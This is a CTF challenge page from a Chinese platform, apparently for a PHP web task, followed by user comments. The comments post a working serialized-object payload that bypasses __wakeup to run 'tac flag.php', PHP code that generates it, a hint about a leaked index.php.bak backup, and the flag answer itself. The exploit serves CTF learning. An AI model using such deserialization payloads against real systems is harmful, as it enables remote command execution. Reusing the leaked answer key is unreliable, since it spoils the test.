安慰奖WEB 未解决

分数: 35 金币: 5
题目作者: harry
一  血: dotast
一血奖励: 2金币
解  决: 2410
提  示:
描  述:
flag{}
评论
wxy1343 2年前

http://114.67.175.224:18718/index.php?code=O:3:"ctf":5:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:19:"tac flag.php|base64";}

回复 0

wxy1343 2年前

flag{Unser1alize_and_2CE_Add}

回复 1

yuanyipaceandlove 2年前

class ctf { protected $username = 'admin' ; protected $cmd = 'ca$@t flag.php' ; } $a = new ctf(); $a = serialize($a); $a = str_replace(':2:{',':3:{',$a); $a=urlencode($a); echo $a;

回复 0

15683956189 3年前

特别要注意下url编码的问题

回复 0

泡椒控卫 3年前

https://blog.csdn.net/m0_57954651/article/details/127866733

回复 0

追风亚索 3年前

flag{Unser1alize_and_2CE_Add},flag是不是没变

回复 0

笨笨笨蛋 3年前

只要序列化的中的成员数大于实际成员数,即可绕过,虽然不是很懂,但是对这个有一个印象了 dirsearch很实用哦~

回复 2

YLMB001 3年前

为什么我序列化后的protected属性是带有%20*%20而不是%00*%00

回复 0

lysandria 3年前

注意protect属性。

回复 0

xiaoxiao972521 4年前

认输,查到backups后,哪哪没消息了。。。鬼知道起名index.php.bak,人与人的想法不一样。。index.php_bak_20220430

回复 0
SiiiirR0 3年前

万能的dirsearch

回复 1

WriteUp

image
小赵同学

3 金币

评分(4)

解题动态

dlgz 攻破了该题 1天前
小王爱汉堡 攻破了该题 3天前
磊诺 攻破了该题 6天前
2523822945 攻破了该题 7天前
好累啊 攻破了该题 8天前
要加两个蛋 攻破了该题 8天前
lin123 攻破了该题 8天前
yiluoqingqiu 攻破了该题 8天前
柯润 攻破了该题 8天前
2970554631 攻破了该题 8天前
不嘻嘻123 攻破了该题 8天前
lmz123 攻破了该题 8天前
xiemeimei 攻破了该题 8天前
18353517196 攻破了该题 8天前
折海 攻破了该题 8天前
337556453 攻破了该题 8天前
Aurora* 攻破了该题 8天前
孙笑川ᒿ58 攻破了该题 8天前
123!!! 攻破了该题 8天前
鸟兽兽提交点堵flag来 攻破了该题 8天前
问题反馈